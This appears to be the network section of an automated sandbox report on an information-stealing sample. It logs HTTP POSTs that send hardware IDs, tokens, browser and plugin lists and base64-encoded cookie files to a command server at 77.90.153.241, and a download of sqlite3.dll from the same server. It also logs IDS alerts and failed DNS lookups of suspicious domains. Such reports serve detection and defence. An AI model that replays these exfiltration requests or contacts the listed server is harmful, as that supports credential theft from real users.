Source: global traffic HTTP traffic detected: POST /612acd258782ade8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBKHost: 77.90.153.241Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 44 34 37 43 36 35 33 32 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 2d 2d 0d 0a Data Ascii: ------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="hwid"48D47C6532061437788654------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="build"default------DGHIECGCBKFHIEBGHDBK--
Source: global traffic HTTP traffic detected: POST /612acd258782ade8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHHost: 77.90.153.241Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 39 38 37 32 30 38 36 36 38 34 33 66 35 31 30 63 38 63 35 37 30 33 30 35 34 37 38 32 33 33 62 65 34 62 66 34 64 31 37 30 38 36 36 39 37 64 30 64 36 65 31 30 31 62 62 34 64 36 37 39 65 33 37 62 62 38 38 33 63 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"1398720866843f510c8c570305478233be4bf4d17086697d0d6e101bb4d679e37bb883cd------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="message"browsers------CFCBFBGDBKJKECAAKKFH--
Source: global traffic HTTP traffic detected: POST /612acd258782ade8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBHost: 77.90.153.241Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 39 38 37 32 30 38 36 36 38 34 33 66 35 31 30 63 38 63 35 37 30 33 30 35 34 37 38 32 33 33 62 65 34 62 66 34 64 31 37 30 38 36 36 39 37 64 30 64 36 65 31 30 31 62 62 34 64 36 37 39 65 33 37 62 62 38 38 33 63 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 2d 2d 0d 0a Data Ascii: ------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="token"1398720866843f510c8c570305478233be4bf4d17086697d0d6e101bb4d679e37bb883cd------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="message"plugins------KECFIDGCBFBAKEBFBKFB--
Source: global traffic HTTP traffic detected: POST /612acd258782ade8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEHost: 77.90.153.241Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 39 38 37 32 30 38 36 36 38 34 33 66 35 31 30 63 38 63 35 37 30 33 30 35 34 37 38 32 33 33 62 65 34 62 66 34 64 31 37 30 38 36 36 39 37 64 30 64 36 65 31 30 31 62 62 34 64 36 37 39 65 33 37 62 62 38 38 33 63 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"1398720866843f510c8c570305478233be4bf4d17086697d0d6e101bb4d679e37bb883cd------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="message"fplugins------JDHCBAEHJJJKKFIDGHJE--
Source: global traffic HTTP traffic detected: POST /612acd258782ade8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAEHost: 77.90.153.241Content-Length: 6543Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /a07daa7aeaf96e14/sqlite3.dll HTTP/1.1Host: 77.90.153.241Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /612acd258782ade8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDHHost: 77.90.153.241Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 39 38 37 32 30 38 36 36 38 34 33 66 35 31 30 63 38 63 35 37 30 33 30 35 34 37 38 32 33 33 62 65 34 62 66 34 64 31 37 30 38 36 36 39 37 64 30 64 36 65 31 30 31 62 62 34 64 36 37 39 65 33 37 62 62 38 38 33 63 64 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="token"1398720866843f510c8c570305478233be4bf4d17086697d0d6e101bb4d679e37bb883cd------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------DHIJEHJDHJKECBFHDHDH--
Source: global traffic HTTP traffic detected: POST /612acd258782ade8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEHost: 77.90.153.241Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 39 38 37 32 30 38 36 36 38 34 33 66 35 31 30 63 38 63 35 37 30 33 30 35 34 37 38 32 33 33 62 65 34 62 66 34 64 31 37 30 38 36 36 39 37 64 30 64 36 65 31 30 31 62 62 34 64 36 37 39 65 33 37 62 62 38 38 33 63 64 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="token"1398720866843f510c8c570305478233be4bf4d17086697d0d6e101bb4d679e37bb883cd------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="file"------HIDBFCBGDBKKECBFCGIE--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View IP Address: 2.22.242.97 2.22.242.97
Source: Joe Sandbox View IP Address: 23.197.127.21 23.197.127.21
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49863 -> 77.90.153.244:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49866 -> 23.197.127.21:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49900 -> 77.90.153.244:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49902 -> 23.197.127.21:443
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49869 -> 77.90.153.241:80
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: weaponrywo.digital replaycode: Name error (3)
Source: unknown DNS traffic detected: query: crosshairc.life replaycode: Name error (3)
Source: unknown DNS traffic detected: query: guntac.bet replaycode: Name error (3)
Source: unknown DNS traffic detected: query: htardwarehu.icu replaycode: Name error (3)
Source: unknown DNS traffic detected: query: guntac.bet replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: bugildbett.top replaycode: Name error (3)
Source: unknown DNS traffic detected: query: citywand.live replaycode: Name error (3)
Source: unknown DNS traffic detected: query: legenassedk.top replaycode: Name error (3)
Source: unknown DNS traffic detected: query: jowinjoinery.icu replaycode: Name error (3)
Source: unknown DNS traffic detected: query: mrodularmall.top replaycode: Name error (3)
Source: unknown DNS traffic detected: query: cjlaspcorne.icu replaycode: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 2.19.96.130
Source: unknown TCP traffic detected without corresponding DNS query: 2.19.96.130
Source: unknown TCP traffic detected without corresponding DNS query: 2.23.77.188
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.130
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.130
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.130
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.130
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.130
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.130
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.130
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.130
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown TCP traffic detected without corresponding DNS query: 23.200.0.10
Source: unknown TCP traffic detected without corresponding DNS query: 23.200.0.10
Source: unknown TCP traffic detected without corresponding DNS query: 23.200.0.10
Source: unknown TCP traffic detected without corresponding DNS query: 23.200.0.10
Source: unknown TCP traffic detected without corresponding DNS query: 23.200.0.10
Source: unknown TCP traffic detected without corresponding DNS query: 23.200.0.10
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.84
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.215
Source: unknown TCP traffic detected without corresponding DNS query: 23.200.0.10
Source: unknown TCP traffic detected without corresponding DNS query: 23.200.0.10
Source: unknown TCP traffic detected without corresponding DNS query: 23.200.0.10
Source: unknown TCP traffic detected without corresponding DNS query: 23.200.0.10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00403850 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 3_2_00403850
Source: global traffic HTTP traffic detected: GET /g_etcontent HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0Host: t.p.formaxprime.co.ukConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiJo8sBCIWgzQEI9s/OAQiA1s4BCNLgzgEI8ePOAQiv5M4BCOLkzgEIi+XOAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiJo8sBCIWgzQEI9s/OAQiA1s4BCNLgzgEI8ePOAQiv5M4BCOLkzgEIi+XOAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.cb278af4d754dd8a1a58.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=CCC4BF56BE6D436AB6D7A035D19C6D0A.RefC=2025-03-15T12:56:38Z; USRLOC=; MUID=29535F340DD9650527FA4A840C536462; MUIDB=29535F340DD9650527FA4A840C536462; _EDGE_S=F=1&SID=2114F98B268160EE3509EC3B27896140; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=CCC4BF56BE6D436AB6D7A035D19C6D0A.RefC=2025-03-15T12:56:38Z; USRLOC=; MUID=29535F340DD9650527FA4A840C536462; MUIDB=29535F340DD9650527FA4A840C536462; _EDGE_S=F=1&SID=2114F98B268160EE3509EC3B27896140; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.08ddc3af8246ad2193cd.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.1ed6fad3ee8a8960478c.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.f2bbb948ce12d0d1625c.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
